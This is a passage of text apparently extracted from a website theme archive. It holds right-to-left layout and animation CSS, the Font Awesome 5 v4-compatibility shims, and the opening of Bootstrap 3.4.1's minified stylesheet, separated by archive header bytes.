body.rtl .sp-simpleportfolio .sp-simpleportfolio-filter > ul > li.no-margin > a {
  border-radius: 0;
  padding: 5px 20px;
}
body.rtl .sp-simpleportfolio .sp-simpleportfolio-filter ul li .simple-divider {
  float: right !important;
  direction: rtl;
}
body.rtl .sp-simpleportfolio .sp-simpleportfolio-filter > ul > li.no-margin:first-child > a {
  border-radius: 0 4px 4px 0;
}
body.rtl .sp-simpleportfolio .sp-simpleportfolio-filter > ul > li.no-margin:last-child > a {
  border-radius: 4px 0 0 4px;
}
body.rtl .sp-simpleportfolio-info .sp-simpleportfolio-tags i.fa {
  margin-left: 7px;
  margin-right: 0;
}
body.rtl a#scroll-top {
  left: -40px;
  right: auto;
}
body.rtl a#scroll-top.open {
  left: 10px;
  right: auto;
}
body.rtl .login-wrapper >i.pe,
body.rtl .registration-wrapper >i.pe,
body.rtl .reset-wrapper >i.pe,
body.rtl .remind-wrapper >i.pe {
  left: auto;
  right: 2vw;
}
body.rtl .login-wrapper .form-group >button.btn {
  float: right;
}
body.rtl .login-wrapper .form-group .form-links {
  direction: rtl;
  float: right;
  text-align: right;
  display: table;
  width: auto;
  margin-top: 3px;
}
body.rtl .login-wrapper .form-group .form-links >a {
  display: table-cell;
  padding: 0 5px;
}
body.rtl .login-wrapper .form-footer {
  display: inline-table;
  direction: rtl;
  clear: both;
  width: 100%;
}
body.rtl .login-wrapper .form-footer >a {
  display: inline-table;
  padding: 0 5px;
}
body.rtl .login-wrapper >i.pe {
  right: 8vw;
  left: auto;
}
body.rtl .remind-wrapper >i.pe {
  right: 2vw;
  left: auto;
}
body.rtl .reset-wrapper >i.pe {
  right: 7vw;
  left: auto;
}
body.rtl .ap-modal-login {
  float: left !important;
}
body.rtl .ap-modal-login .title {
  float: right;
}
body.rtl .ap-modal-login .title i.pe {
  margin: -1px 0 0 8px;
}
body.rtl .ap-modal-login .modal-content .modal-body .button-wrap {
  float: right !important;
  margin-right: 0;
}
body.rtl .ap-modal-login .modal-content .modal-body .remember-wrap {
  float: right;
  text-align: right;
  margin-right: 0;
}
body.rtl .ap-modal-login .modal-content .modal-body .forget-name-link {
  float: right !important;
  margin-right: 10px;
  padding-top: 3px;
  text-align: right;
  display: table;
}
body.rtl .ap-modal-login .modal-content .modal-body .forget-name-link >a {
  display: table-cell;
  padding: 0 5px;
}
body.rtl .ap-modal-login .modal-header .title {
  text-align: right;
}
body.rtl .ap-modal-login .modal-header .close {
  left: 10px;
  right: auto;
}
body.rtl .sp-contact-info {
  float: right;
}
.sp-comingsoon body a.logo img.sp-default-logo {
  text-align: center;
  margin: 0 auto;
}
.sp-comingsoon body a.logo div.backhome {
  display: none;
}
.sp-comingsoon body a.logo:hover img.sp-default-logo {
  margin: 0 auto;
}
@media (max-width: 768px) {
  #vmCartModule {
    display: inline-block;
    float: none;
    margin-left: 0;
    margin-right: 0;
    left: 0;
    right: auto;
    width: 60px;
    text-align: center;
  }
  .top-search-wrapper {
    left: 30px;
    right: auto;
  }
  .top-search-input-wrap .top-search-wrap {
    left: 5vw;
    right: auto;
  }
  .centered .top-search-wrap,
  .addspace .top-search-wrap {
    left: -20vw;
    right: auto;
  }
  #offcanvas-toggler {
    display: inline-block;
    float: left;
    position: relative;
    right: auto;
    left: -10px;
    margin-left: 0;
    margin-right: 0;
  }
  #offcanvas-toggler i {
    text-align: center;
    width: 60px;
  }
  #cart-menu,
  .cd-cart {
    float: left;
  }
  #cart-menu >i,
  .cd-cart >i {
    top: 0;
  }
  #cart-menu .total_products,
  .cd-cart .total_products {
    left: auto;
    right: 18px;
    top: 21px;
    float: right;
    -webkit-transform: scale(1.1,1.1);
    transform: scale(1.1,1.1);
  }
  header.centered #cart-menu >i,
  header.centered .cd-cart >i,
  header.addspace #cart-menu >i,
  header.addspace .cd-cart >i {
    width: 100px;
    padding-left: 17px;
  }
  header.centered #offcanvas-toggler,
  header.addspace #offcanvas-toggler {
    float: right !important;
    left: auto;
    right: 0 !important;
    position: absolute !important;
    z-index: 3;
  }
  .sticky-wrapper.is-sticky #sp-header .cd-cart >i {
    font-size: 30px;
    padding-left: 32px;
    float: right;
  }
  .sticky-wrapper.is-sticky #sp-header .cd-cart .total_products {
    height: 18px;
    width: 18px;
    line-height: 18px;
    top: 8px;
    right: 1px;
  }
}
@media (max-width: 480px) {
  .sppb-addon-timeline .sppb-addon-timeline-wrapper .odd .timeline-item .timeline-panel:before {
    top: -5px !important;
  }
}
@-webkit-keyframes push-in {
  0% {
    opacity: 0;
    -webkit-transform: translateX(150%);
  }
  65% {
    opacity: 1;
    -webkit-transform: translateX(-10%);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateX(0);
  }
}
@keyframes push-in {
  0% {
    opacity: 0;
    -webkit-transform: translateX(150%);
    -moz-transform: translateX(-150%);
    -ms-transform: translateX(-150%);
    -o-transform: translateX(-150%);
    transform: translateX(150%);
  }
  65% {
    opacity: 1;
    -webkit-transform: translateX(-10%);
    -moz-transform: translateX(10%);
    -ms-transform: translateX(10%);
    -o-transform: translateX(10%);
    transform: translateX(-10%);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateX(0);
    -moz-transform: translateX(0);
    -ms-transform: translateX(0);
    -o-transform: translateX(0);
    transform: translateX(0);
  }
}
@-webkit-keyframes push-out {
  0% {
    opacity: 1;
    -webkit-transform: translateX(0);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateX(-150%);
  }
}
@keyframes push-out {
  0% {
    opacity: 1;
    -webkit-transform: translateX(0);
    -moz-transform: translateX(0);
    -ms-transform: translateX(0);
    -o-transform: translateX(0);
    transform: translateX(0);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateX(-150%);
    -moz-transform: translateX(150%);
    -ms-transform: translateX(150%);
    -o-transform: translateX(150%);
    transform: translateX(-150%);
  }
}
PK!�ד�DDflex/css/fa-v4-shims.cssnu&1i�/*!
 * Font Awesome Free 5.13.0 by @fontawesome - https://fontawesome.com
 * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License)
 */

/* brands icons*/
.fa.fa-500px,.fa.fa-adn,.fa.fa-amazon,.fa.fa-android,.fa.fa-angellist,.fa.fa-apple,.fa.fa-bandcamp,.fa.fa-behance,.fa.fa-behance-square,.fa.fa-bitbucket,.fa.fa-bitbucket-square,.fa.fa-bitcoin,.fa.fa-black-tie,.fa.fa-bluetooth,.fa.fa-bluetooth-b,.fa.fa-btc,.fa.fa-buysellads,.fa.fa-cc-amex,.fa.fa-cc-diners-club,.fa.fa-cc-discover,.fa.fa-cc-jcb,.fa.fa-cc-mastercard,.fa.fa-cc-paypal,.fa.fa-cc-stripe,.fa.fa-cc-visa,.fa.fa-chrome,.fa.fa-codepen,.fa.fa-codiepie,.fa.fa-connectdevelop,.fa.fa-contao,.fa.fa-creative-commons,.fa.fa-css3,.fa.fa-dashcube,.fa.fa-delicious,.fa.fa-deviantart,.fa.fa-digg,.fa.fa-dribbble,.fa.fa-dropbox,.fa.fa-drupal,.fa.fa-edge,.fa.fa-eercast,.fa.fa-empire,.fa.fa-envira,.fa.fa-etsy,.fa.fa-expeditedssl,.fa.fa-fa,.fa.fa-facebook,.fa.fa-facebook-f,.fa.fa-facebook-official,.fa.fa-facebook-square,.fa.fa-firefox,.fa.fa-first-order,.fa.fa-flickr,.fa.fa-font-awesome,.fa.fa-fonticons,.fa.fa-fort-awesome,.fa.fa-forumbee,.fa.fa-foursquare,.fa.fa-free-code-camp,.fa.fa-ge,.fa.fa-get-pocket,.fa.fa-gg,.fa.fa-gg-circle,.fa.fa-git,.fa.fa-git-square,.fa.fa-github,.fa.fa-github-alt,.fa.fa-github-square,.fa.fa-gitlab,.fa.fa-gittip,.fa.fa-glide,.fa.fa-glide-g,.fa.fa-google,.fa.fa-google-plus,.fa.fa-google-plus-circle,.fa.fa-google-plus-official,.fa.fa-google-plus-square,.fa.fa-google-wallet,.fa.fa-gratipay,.fa.fa-grav,.fa.fa-hacker-news,.fa.fa-houzz,.fa.fa-html5,.fa.fa-imdb,.fa.fa-instagram,.fa.fa-internet-explorer,.fa.fa-ioxhost,.fa.fa-joomla,.fa.fa-jsfiddle,.fa.fa-lastfm,.fa.fa-lastfm-square,.fa.fa-leanpub,.fa.fa-linkedin,.fa.fa-linkedin-square,.fa.fa-linode,.fa.fa-linux,.fa.fa-maxcdn,.fa.fa-meanpath,.fa.fa-medium,.fa.fa-meetup,.fa.fa-mixcloud,.fa.fa-modx,.fa.fa-odnoklassniki,.fa.fa-odnoklassniki-square,.fa.fa-opencart,.fa.fa-openid,.fa.fa-opera,.fa.fa-optin-monster,.fa.fa-pagelines,.fa.fa-paypal,.fa.fa-pied-piper,.fa.fa-pied-piper-alt,.fa.fa-pied-piper-pp,.fa.fa-pinterest,.fa.fa-pinterest-p,.fa.fa-pinterest-square,.fa.fa-product-hunt,.fa.fa-qq,.fa.fa-quora,.fa.fa-ra,.fa.fa-ravelry,.fa.fa-rebel,.fa.fa-reddit,.fa.fa-reddit-alien,.fa.fa-reddit-square,.fa.fa-renren,.fa.fa-resistance,.fa.fa-safari,.fa.fa-scribd,.fa.fa-sellsy,.fa.fa-shirtsinbulk,.fa.fa-simplybuilt,.fa.fa-skyatlas,.fa.fa-skype,.fa.fa-slack,.fa.fa-slideshare,.fa.fa-snapchat,.fa.fa-snapchat-ghost,.fa.fa-snapchat-square,.fa.fa-soundcloud,.fa.fa-spotify,.fa.fa-stack-exchange,.fa.fa-stack-overflow,.fa.fa-steam,.fa.fa-steam-square,.fa.fa-stumbleupon,.fa.fa-stumbleupon-circle,.fa.fa-superpowers,.fa.fa-telegram,.fa.fa-tencent-weibo,.fa.fa-themeisle,.fa.fa-trello,.fa.fa-tripadvisor,.fa.fa-tumblr,.fa.fa-tumblr-square,.fa.fa-twitch,.fa.fa-twitter,.fa.fa-twitter-square,.fa.fa-usb,.fa.fa-viacoin,.fa.fa-viadeo,.fa.fa-viadeo-square,.fa.fa-vimeo,.fa.fa-vimeo-square,.fa.fa-vine,.fa.fa-vk,.fa.fa-wechat,.fa.fa-weibo,.fa.fa-weixin,.fa.fa-whatsapp,.fa.fa-wheelchair-alt,.fa.fa-wikipedia-w,.fa.fa-windows,.fa.fa-wordpress,.fa.fa-wpbeginner,.fa.fa-wpexplorer,.fa.fa-wpforms,.fa.fa-xing,.fa.fa-xing-square,.fa.fa-y-combinator,.fa.fa-y-combinator-square,.fa.fa-yahoo,.fa.fa-yc,.fa.fa-yc-square,.fa.fa-yelp,.fa.fa-yoast,.fa.fa-youtube,.fa.fa-youtube-play,.fa.fa-youtube-square{font-family:'Font Awesome 5 Brands';font-weight:400}

/* Regular icons */
.fa.fa-address-book-o,.fa.fa-address-card-o,.fa.fa-arrow-circle-o-down,.fa.fa-arrow-circle-o-left,.fa.fa-arrow-circle-o-right,.fa.fa-arrow-circle-o-up,.fa.fa-bar-chart,.fa.fa-bar-chart-o,.fa.fa-bell-o,.fa.fa-bell-slash-o,.fa.fa-bookmark-o,.fa.fa-building-o,.fa.fa-calendar-check-o,.fa.fa-calendar-minus-o,.fa.fa-calendar-o,.fa.fa-calendar-plus-o,.fa.fa-calendar-times-o,.fa.fa-caret-square-o-down,.fa.fa-caret-square-o-left,.fa.fa-caret-square-o-right,.fa.fa-caret-square-o-up,.fa.fa-cc,.fa.fa-check-circle-o,.fa.fa-check-square-o,.fa.fa-circle-o,.fa.fa-circle-thin,.fa.fa-clipboard,.fa.fa-clock-o,.fa.fa-clone,.fa.fa-comment-o,.fa.fa-commenting,.fa.fa-commenting-o,.fa.fa-comments-o,.fa.fa-compass,.fa.fa-copyright,.fa.fa-credit-card,.fa.fa-diamond,.fa.fa-dot-circle-o,.fa.fa-drivers-license-o,.fa.fa-envelope-o,.fa.fa-envelope-open-o,.fa.fa-eye,.fa.fa-eye-slash,.fa.fa-file-archive-o,.fa.fa-file-audio-o,.fa.fa-file-code-o,.fa.fa-file-excel-o,.fa.fa-file-image-o,.fa.fa-file-movie-o,.fa.fa-file-o,.fa.fa-file-pdf-o,.fa.fa-file-photo-o,.fa.fa-file-picture-o,.fa.fa-file-powerpoint-o,.fa.fa-file-sound-o,.fa.fa-file-text-o,.fa.fa-file-video-o,.fa.fa-file-word-o,.fa.fa-file-zip-o,.fa.fa-files-o,.fa.fa-flag-o,.fa.fa-floppy-o,.fa.fa-folder-o,.fa.fa-folder-open-o,.fa.fa-frown-o,.fa.fa-futbol-o,.fa.fa-hand-grab-o,.fa.fa-hand-lizard-o,.fa.fa-hand-o-down,.fa.fa-hand-o-left,.fa.fa-hand-o-right,.fa.fa-hand-o-up,.fa.fa-hand-paper-o,.fa.fa-hand-peace-o,.fa.fa-hand-pointer-o,.fa.fa-hand-rock-o,.fa.fa-hand-scissors-o,.fa.fa-hand-spock-o,.fa.fa-hand-stop-o,.fa.fa-handshake-o,.fa.fa-hdd-o,.fa.fa-heart-o,.fa.fa-hospital-o,.fa.fa-hourglass-o,.fa.fa-id-badge,.fa.fa-id-card-o,.fa.fa-image,.fa.fa-keyboard-o,.fa.fa-lemon-o,.fa.fa-life-bouy,.fa.fa-life-buoy,.fa.fa-life-ring,.fa.fa-life-saver,.fa.fa-lightbulb-o,.fa.fa-list-alt,.fa.fa-map-o,.fa.fa-meh-o,.fa.fa-minus-square-o,.fa.fa-money,.fa.fa-moon-o,.fa.fa-newspaper-o,.fa.fa-object-group,.fa.fa-object-ungroup,.fa.fa-paper-plane-o,.fa.fa-paste,.fa.fa-pause-circle-o,.fa.fa-pencil-square-o,.fa.fa-photo,.fa.fa-picture-o,.fa.fa-play-circle-o,.fa.fa-plus-square-o,.fa.fa-question-circle-o,.fa.fa-registered,.fa.fa-send-o,.fa.fa-share-square-o,.fa.fa-smile-o,.fa.fa-snowflake-o,.fa.fa-soccer-ball-o,.fa.fa-square-o,.fa.fa-star-half-empty,.fa.fa-star-half-full,.fa.fa-star-half-o,.fa.fa-star-o,.fa.fa-sticky-note-o,.fa.fa-stop-circle-o,.fa.fa-sun-o,.fa.fa-support,.fa.fa-thumbs-o-down,.fa.fa-thumbs-o-up,.fa.fa-times-circle-o,.fa.fa-times-rectangle-o,.fa.fa-toggle-down,.fa.fa-toggle-left,.fa.fa-toggle-right,.fa.fa-toggle-up,.fa.fa-trash-o,.fa.fa-user-circle-o,.fa.fa-user-o,.fa.fa-vcard-o,.fa.fa-window-close-o,.fa.fa-window-maximize,.fa.fa-window-restore{font-family:"Font Awesome 5 Free";font-weight:400}

/* Icon name changed */
.fa.fa-glass:before{content:"\f000"}.fa.fa-star-o:before{content:"\f005"}.fa.fa-close:before,.fa.fa-remove:before{content:"\f00d"}.fa.fa-gear:before{content:"\f013"}.fa.fa-trash-o:before{content:"\f2ed"}.fa.fa-file-o:before{content:"\f15b"}.fa.fa-clock-o:before{content:"\f017"}.fa.fa-arrow-circle-o-down:before{content:"\f358"}.fa.fa-arrow-circle-o-up:before{content:"\f35b"}.fa.fa-play-circle-o:before{content:"\f144"}.fa.fa-repeat:before,.fa.fa-rotate-right:before{content:"\f01e"}.fa.fa-refresh:before{content:"\f021"}.fa.fa-dedent:before{content:"\f03b"}.fa.fa-video-camera:before{content:"\f03d"}.fa.fa-picture-o:before{content:"\f03e"}.fa.fa-photo:before{content:"\f03e"}.fa.fa-image:before{content:"\f03e"}.fa.fa-pencil:before{content:"\f303"}.fa.fa-map-marker:before{content:"\f3c5"}.fa.fa-pencil-square-o:before{content:"\f044"}.fa.fa-share-square-o:before{content:"\f14d"}.fa.fa-check-square-o:before{content:"\f14a"}.fa.fa-arrows:before{content:"\f0b2"}.fa.fa-times-circle-o:before{content:"\f057"}.fa.fa-check-circle-o:before{content:"\f058"}.fa.fa-mail-forward:before{content:"\f064"}.fa.fa-expand:before{content:"\f424"}.fa.fa-compress:before{content:"\f422"}.fa.fa-warning:before{content:"\f071"}.fa.fa-calendar:before{content:"\f073"}.fa.fa-arrows-v:before{content:"\f338"}.fa.fa-arrows-h:before{content:"\f337"}.fa.fa-bar-chart:before{content:"\f080"}.fa.fa-bar-chart-o:before{content:"\f080"}.fa.fa-gears:before{content:"\f085"}.fa.fa-thumbs-o-up:before{content:"\f164"}.fa.fa-thumbs-o-down:before{content:"\f165"}.fa.fa-heart-o:before{content:"\f004"}.fa.fa-sign-out:before{content:"\f2f5"}.fa.fa-linkedin-square:before{content:"\f08c"}.fa.fa-thumb-tack:before{content:"\f08d"}.fa.fa-external-link:before{content:"\f35d"}.fa.fa-sign-in:before{content:"\f2f6"}.fa.fa-lemon-o:before{content:"\f094"}.fa.fa-square-o:before{content:"\f0c8"}.fa.fa-bookmark-o:before{content:"\f02e"}.fa.fa-facebook:before{content:"\f39e"}.fa.fa-facebook-f:before{content:"\f39e"}.fa.fa-feed:before{content:"\f09e"}.fa.fa-hdd-o:before{content:"\f0a0"}.fa.fa-hand-o-right:before{content:"\f0a4"}.fa.fa-hand-o-left:before{content:"\f0a5"}.fa.fa-hand-o-up:before{content:"\f0a6"}.fa.fa-hand-o-down:before{content:"\f0a7"}.fa.fa-arrows-alt:before{content:"\f31e"}.fa.fa-group:before{content:"\f0c0"}.fa.fa-chain:before{content:"\f0c1"}.fa.fa-scissors:before{content:"\f0c4"}.fa.fa-files-o:before{content:"\f0c5"}.fa.fa-floppy-o:before{content:"\f0c7"}.fa.fa-navicon:before,.fa.fa-reorder:before{content:"\f0c9"}.fa.fa-google-plus:before{content:"\f0d5"}.fa.fa-money:before{content:"\f3d1"}.fa.fa-unsorted:before{content:"\f0dc"}.fa.fa-sort-desc:before{content:"\f0dd"}.fa.fa-sort-asc:before{content:"\f0de"}.fa.fa-linkedin:before{content:"\f0e1"}.fa.fa-rotate-left:before{content:"\f0e2"}.fa.fa-legal:before{content:"\f0e3"}.fa.fa-dashboard:before,.fa.fa-tachometer:before{content:"\f3fd"}.fa.fa-comment-o:before{content:"\f075"}.fa.fa-comments-o:before{content:"\f086"}.fa.fa-flash:before{content:"\f0e7"}.fa.fa-paste:before{content:"\f328"}.fa.fa-lightbulb-o:before{content:"\f0eb"}.fa.fa-exchange:before{content:"\f362"}.fa.fa-cloud-download:before{content:"\f381"}.fa.fa-cloud-upload:before{content:"\f382"}.fa.fa-bell-o:before{content:"\f0f3"}.fa.fa-cutlery:before{content:"\f2e7"}.fa.fa-file-text-o:before{content:"\f15c"}.fa.fa-building-o:before{content:"\f1ad"}.fa.fa-hospital-o:before{content:"\f0f8"}.fa.fa-tablet:before{content:"\f3fa"}.fa.fa-mobile-phone:before,.fa.fa-mobile:before{content:"\f3cd"}.fa.fa-circle-o:before{content:"\f111"}.fa.fa-mail-reply:before{content:"\f3e5"}.fa.fa-folder-o:before{content:"\f07b"}.fa.fa-folder-open-o:before{content:"\f07c"}.fa.fa-smile-o:before{content:"\f118"}.fa.fa-frown-o:before{content:"\f119"}.fa.fa-meh-o:before{content:"\f11a"}.fa.fa-keyboard-o:before{content:"\f11c"}.fa.fa-flag-o:before{content:"\f024"}.fa.fa-mail-reply-all:before{content:"\f122"}.fa.fa-star-half-o:before{content:"\f089"}.fa.fa-star-half-empty:before{content:"\f089"}.fa.fa-star-half-full:before{content:"\f089"}.fa.fa-code-fork:before{content:"\f126"}.fa.fa-chain-broken:before{content:"\f127"}.fa.fa-shield:before{content:"\f3ed"}.fa.fa-calendar-o:before{content:"\f133"}.fa.fa-ticket:before{content:"\f3ff"}.fa.fa-minus-square-o:before{content:"\f146"}.fa.fa-level-up:before{content:"\f3bf"}.fa.fa-level-down:before{content:"\f3be"}.fa.fa-pencil-square:before{content:"\f14b"}.fa.fa-external-link-square:before{content:"\f360"}.fa.fa-caret-square-o-down:before{content:"\f150"}.fa.fa-toggle-down:before{content:"\f150"}.fa.fa-caret-square-o-up:before{content:"\f151"}.fa.fa-toggle-up:before{content:"\f151"}.fa.fa-caret-square-o-right:before{content:"\f152"}.fa.fa-toggle-right:before{content:"\f152"}.fa.fa-eur:before,.fa.fa-euro:before{content:"\f153"}.fa.fa-gbp:before{content:"\f154"}.fa.fa-dollar:before,.fa.fa-usd:before{content:"\f155"}.fa.fa-inr:before,.fa.fa-rupee:before{content:"\f156"}.fa.fa-cny:before,.fa.fa-jpy:before,.fa.fa-rmb:before,.fa.fa-yen:before{content:"\f157"}.fa.fa-rouble:before,.fa.fa-rub:before,.fa.fa-ruble:before{content:"\f158"}.fa.fa-krw:before,.fa.fa-won:before{content:"\f159"}.fa.fa-bitcoin:before{content:"\f15a"}.fa.fa-file-text:before{content:"\f15c"}.fa.fa-sort-alpha-asc:before{content:"\f15d"}.fa.fa-sort-alpha-desc:before{content:"\f881"}.fa.fa-sort-amount-asc:before{content:"\f160"}.fa.fa-sort-amount-desc:before{content:"\f884"}.fa.fa-sort-numeric-asc:before{content:"\f162"}.fa.fa-sort-numeric-desc:before{content:"\f886"}.fa.fa-youtube-play:before{content:"\f167"}.fa.fa-bitbucket-square:before{content:"\f171"}.fa.fa-long-arrow-down:before{content:"\f309"}.fa.fa-long-arrow-up:before{content:"\f30c"}.fa.fa-long-arrow-left:before{content:"\f30a"}.fa.fa-long-arrow-right:before{content:"\f30b"}.fa.fa-gittip:before{content:"\f184"}.fa.fa-sun-o:before{content:"\f185"}.fa.fa-moon-o:before{content:"\f186"}.fa.fa-arrow-circle-o-right:before{content:"\f35a"}.fa.fa-arrow-circle-o-left:before{content:"\f359"}.fa.fa-caret-square-o-left:before{content:"\f191"}.fa.fa-toggle-left:before{content:"\f191"}.fa.fa-dot-circle-o:before{content:"\f192"}.fa.fa-try:before,.fa.fa-turkish-lira:before{content:"\f195"}.fa.fa-plus-square-o:before{content:"\f0fe"}.fa.fa-bank:before,.fa.fa-institution:before{content:"\f19c"}.fa.fa-mortar-board:before{content:"\f19d"}.fa.fa-spoon:before{content:"\f2e5"}.fa.fa-automobile:before{content:"\f1b9"}.fa.fa-envelope-o:before{content:"\f0e0"}.fa.fa-file-pdf-o:before{content:"\f1c1"}.fa.fa-file-word-o:before{content:"\f1c2"}.fa.fa-file-excel-o:before{content:"\f1c3"}.fa.fa-file-powerpoint-o:before{content:"\f1c4"}.fa.fa-file-image-o:before{content:"\f1c5"}.fa.fa-file-photo-o:before{content:"\f1c5"}.fa.fa-file-picture-o:before{content:"\f1c5"}.fa.fa-file-archive-o:before{content:"\f1c6"}.fa.fa-file-zip-o:before{content:"\f1c6"}.fa.fa-file-audio-o:before{content:"\f1c7"}.fa.fa-file-sound-o:before{content:"\f1c7"}.fa.fa-file-video-o:before{content:"\f1c8"}.fa.fa-file-movie-o:before{content:"\f1c8"}.fa.fa-file-code-o:before{content:"\f1c9"}.fa.fa-life-bouy:before{content:"\f1cd"}.fa.fa-life-buoy:before{content:"\f1cd"}.fa.fa-life-saver:before{content:"\f1cd"}.fa.fa-support:before{content:"\f1cd"}.fa.fa-circle-o-notch:before{content:"\f1ce"}.fa.fa-ra:before{content:"\f1d0"}.fa.fa-resistance:before{content:"\f1d0"}.fa.fa-ge:before{content:"\f1d1"}.fa.fa-y-combinator-square:before{content:"\f1d4"}.fa.fa-yc-square:before{content:"\f1d4"}.fa.fa-wechat:before{content:"\f1d7"}.fa.fa-send:before{content:"\f1d8"}.fa.fa-paper-plane-o:before{content:"\f1d8"}.fa.fa-send-o:before{content:"\f1d8"}.fa.fa-circle-thin:before{content:"\f111"}.fa.fa-header:before{content:"\f1dc"}.fa.fa-sliders:before{content:"\f1de"}.fa.fa-futbol-o:before{content:"\f1e3"}.fa.fa-soccer-ball-o:before{content:"\f1e3"}.fa.fa-newspaper-o:before{content:"\f1ea"}.fa.fa-bell-slash-o:before{content:"\f1f6"}.fa.fa-trash:before{content:"\f2ed"}.fa.fa-eyedropper:before{content:"\f1fb"}.fa.fa-area-chart:before{content:"\f1fe"}.fa.fa-pie-chart:before{content:"\f200"}.fa.fa-line-chart:before{content:"\f201"}.fa.fa-cc:before{content:"\f20a"}.fa.fa-ils:before,.fa.fa-shekel:before,.fa.fa-sheqel:before{content:"\f20b"}.fa.fa-meanpath:before{content:"\f2b4"}.fa.fa-diamond:before{content:"\f3a5"}.fa.fa-intersex:before{content:"\f224"}.fa.fa-facebook-official:before{content:"\f09a"}.fa.fa-hotel:before{content:"\f236"}.fa.fa-yc:before{content:"\f23b"}.fa.fa-battery-4:before,.fa.fa-battery:before{content:"\f240"}.fa.fa-battery-3:before{content:"\f241"}.fa.fa-battery-2:before{content:"\f242"}.fa.fa-battery-1:before{content:"\f243"}.fa.fa-battery-0:before{content:"\f244"}.fa.fa-sticky-note-o:before{content:"\f249"}.fa.fa-hourglass-o:before{content:"\f254"}.fa.fa-hourglass-1:before{content:"\f251"}.fa.fa-hourglass-2:before{content:"\f252"}.fa.fa-hourglass-3:before{content:"\f253"}.fa.fa-hand-rock-o:before{content:"\f255"}.fa.fa-hand-grab-o:before{content:"\f255"}.fa.fa-hand-paper-o:before{content:"\f256"}.fa.fa-hand-stop-o:before{content:"\f256"}.fa.fa-hand-scissors-o:before{content:"\f257"}.fa.fa-hand-lizard-o:before{content:"\f258"}.fa.fa-hand-spock-o:before{content:"\f259"}.fa.fa-hand-pointer-o:before{content:"\f25a"}.fa.fa-hand-peace-o:before{content:"\f25b"}.fa.fa-television:before{content:"\f26c"}.fa.fa-calendar-plus-o:before{content:"\f271"}.fa.fa-calendar-minus-o:before{content:"\f272"}.fa.fa-calendar-times-o:before{content:"\f273"}.fa.fa-calendar-check-o:before{content:"\f274"}.fa.fa-map-o:before{content:"\f279"}.fa.fa-commenting:before{content:"\f4ad"}.fa.fa-commenting-o:before{content:"\f4ad"}.fa.fa-vimeo:before{content:"\f27d"}.fa.fa-credit-card-alt:before{content:"\f09d"}.fa.fa-pause-circle-o:before{content:"\f28b"}.fa.fa-stop-circle-o:before{content:"\f28d"}.fa.fa-wheelchair-alt:before{content:"\f368"}.fa.fa-question-circle-o:before{content:"\f059"}.fa.fa-volume-control-phone:before{content:"\f2a0"}.fa.fa-asl-interpreting:before{content:"\f2a3"}.fa.fa-deafness:before,.fa.fa-hard-of-hearing:before{content:"\f2a4"}.fa.fa-signing:before{content:"\f2a7"}.fa.fa-google-plus-official:before{content:"\f2b3"}.fa.fa-google-plus-circle:before{content:"\f2b3"}.fa.fa-fa:before{content:"\f2b4"}.fa.fa-handshake-o:before{content:"\f2b5"}.fa.fa-envelope-open-o:before{content:"\f2b6"}.fa.fa-address-book-o:before{content:"\f2b9"}.fa.fa-vcard:before{content:"\f2bb"}.fa.fa-address-card-o:before{content:"\f2bb"}.fa.fa-vcard-o:before{content:"\f2bb"}.fa.fa-user-circle-o:before{content:"\f2bd"}.fa.fa-user-o:before{content:"\f007"}.fa.fa-drivers-license:before{content:"\f2c2"}.fa.fa-id-card-o:before{content:"\f2c2"}.fa.fa-drivers-license-o:before{content:"\f2c2"}.fa.fa-thermometer-4:before,.fa.fa-thermometer:before{content:"\f2c7"}.fa.fa-thermometer-3:before{content:"\f2c8"}.fa.fa-thermometer-2:before{content:"\f2c9"}.fa.fa-thermometer-1:before{content:"\f2ca"}.fa.fa-thermometer-0:before{content:"\f2cb"}.fa.fa-bathtub:before,.fa.fa-s15:before{content:"\f2cd"}.fa.fa-times-rectangle:before{content:"\f410"}.fa.fa-window-close-o:before{content:"\f410"}.fa.fa-times-rectangle-o:before{content:"\f410"}.fa.fa-eercast:before{content:"\f2da"}.fa.fa-snowflake-o:before{content:"\f2dc"}.fa.fa-cab:before{content:"\f1ba"}PK!1L��$�$�flex/css/bootstrap.min.cssnu&1i�/*!
 * Bootstrap v3.4.1 (https://getbootstrap.com/)
 * Copyright 2011-2019 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:none;text-decoration:underline;-webkit-text-decoration:underline dotted;-moz-text-decoration:underline dotted;text-decoration:underline dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type=checkbox],input[type=radio]{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;padding:0}input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{height:auto}input[type=search]{-webkit-appearance:textfield;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}fieldset{border:1px solid silver;margin:0 2px;padding:.35em .625em .75em}legend{border:0;padding:0}textarea{overflow:auto}optgroup{font-weight:700}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */@media 